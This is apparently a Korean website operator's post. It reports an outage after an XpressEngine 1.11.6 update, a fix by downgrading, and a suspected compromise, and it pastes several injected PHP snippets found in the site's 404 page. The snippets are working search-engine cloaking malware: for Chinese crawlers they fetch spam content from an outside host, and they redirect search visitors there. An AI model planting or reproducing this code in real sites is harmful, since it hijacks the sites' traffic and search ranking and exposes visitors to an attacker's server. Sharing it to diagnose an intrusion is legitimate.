우린친구닷컴 홈페이지 갑자기 다운됨.
상세 설명
XpressEngine Core 1.11.6 버전을 배포합니다.
이 버전에서는 보안취약점을 고쳤으니 모든 운영 중인 웹사이트에 업데이트를 권장합니다.
서버의 PHP 7.2 업그레이드 시 주의 사항
이 배포본에서는 PHP 7.2에 대한 호환성 문제를 고쳤으나,
PHP 7.2 이상의 환경에서는 PHP 7.2에 대응하지 않은 확장 기능 사용시에 문제를 겪을 수 있으므로
PHP 7.2 이상에서는 확장 기능 사용 시 주의 하시기 바랍니다.
관련 정보는 https://www.xpressengine.com/devlog/23249915 에서 찾아볼 수 있습니다.
1.11.6 사용시 먹통
1.11.2 다운그레이드 후 정상
더불어 해킹까지 당한 것 같다.
404 페이지가 이렇게 작성되어 있다.
이것 외에도 몇가지가 더 있던데 어떻게 이런일이??
<?php
header('Content-Type:text/html;charset=gb2312');
$key= $_SERVER["HTTP_USER_AGENT"];
if(strpos($key,strtolower('HaosouSpider'))!== false||strpos($key,strtolower('baidu'))!== false||strpos($key,strtolower('Yisou'))!== false||strpos($key,strtolower('Sogou'))!== false||strpos($key,strtolower('YisouSpider'))!== false||strpos($key,strtolower('360Spider'))!== false||strpos($key,strtolower('Baiduspide'))!== false||strpos($key,strtolower('Soso'))!== false )
{
date_default_timezone_set('PRC');
$TD_server = "http://www1.asdasdasdasd.club/";
$host_name = "http://".$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'];
$Content_mb=file_get_contents($TD_server."/index.php?host=".$host_name."&url=".$_SERVER['QUERY_STRING']."&domain=".$_SERVER['SERVER_NAME']);
echo $Content_mb;
}
$httpuser=strtolower($_SERVER['HTTP_REFERER']);
if(strstr($httpuser,'sogou') or strstr($httpuser,'baidu') or strstr($httpuser,'HaosouSpider') or strstr($httpuser,'YisouSpider'))
{
Header("Location: http://www1.asdasdasdasd.club/");//寧땍契瘻
exit;
}
?>
//////////////////////////////
<?php
header('Content-Type:text/html;charset=gb2312');
$key= $_SERVER["HTTP_USER_AGENT"];
if(strpos($key,strtolower('HaosouSpider'))!== false||strpos($key,strtolower('baidu'))!== false||strpos($key,strtolower('Yisou'))!== false||strpos($key,strtolower('Sogou'))!== false||strpos($key,strtolower('YisouSpider'))!== false||strpos($key,strtolower('360Spider'))!== false||strpos($key,strtolower('Baiduspide'))!== false||strpos($key,strtolower('Soso'))!== false )
{
date_default_timezone_set('PRC');
$TD_server = "http://www1.asdasdasdasd.club/";
$host_name = "http://".$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'];
$Content_mb=file_get_contents($TD_server."/index.php?host=".$host_name."&url=".$_SERVER['QUERY_STRING']."&domain=".$_SERVER['SERVER_NAME']);
echo $Content_mb;
}
?>
<?php
function chkCode($string) {
$code = array(
'ASCII',
'GBK',
'UTF-8'
);
foreach ($code as $c) { if ($string === iconv('UTF-8', $c, iconv($c, 'UTF-8', $string))) {return $c;}}
}
$key= strtolower($_SERVER["HTTP_USER_AGENT"]);
if(stristr($key,'baidu')!=false || stristr($key,'sogou')!=false || stristr($key,'youdao')!=false || stristr($key,'360')!=false || stristr($key,'soso')!=false )
{
set_time_limit(0);
$content=file_get_contents(__FILE__);
if(stristr(__FILE__,"index.html")!=false){
preg_match("/<meta.+?charset=([-\w]+)/i",$content,$charset);
$charset=strtolower($charset[1]);
}else{
if(@chkCode($content)=='UTF-8'){
$charset="utf-8";
}else{
$charset="gbk";
}
}
header("Content-Type: text/html;charset=".$charset);
date_default_timezone_set('PRC');
$u='www1.asdasdasdasd.club';if($charset=='utf-8'){
echo iconv("gb2312","utf-8//IGNORE",file_get_contents('http://'.$u.'/'));
}else{
echo file_get_contents("http://www1.asdasdasdasd.club/?".rand(time()));
}
}?>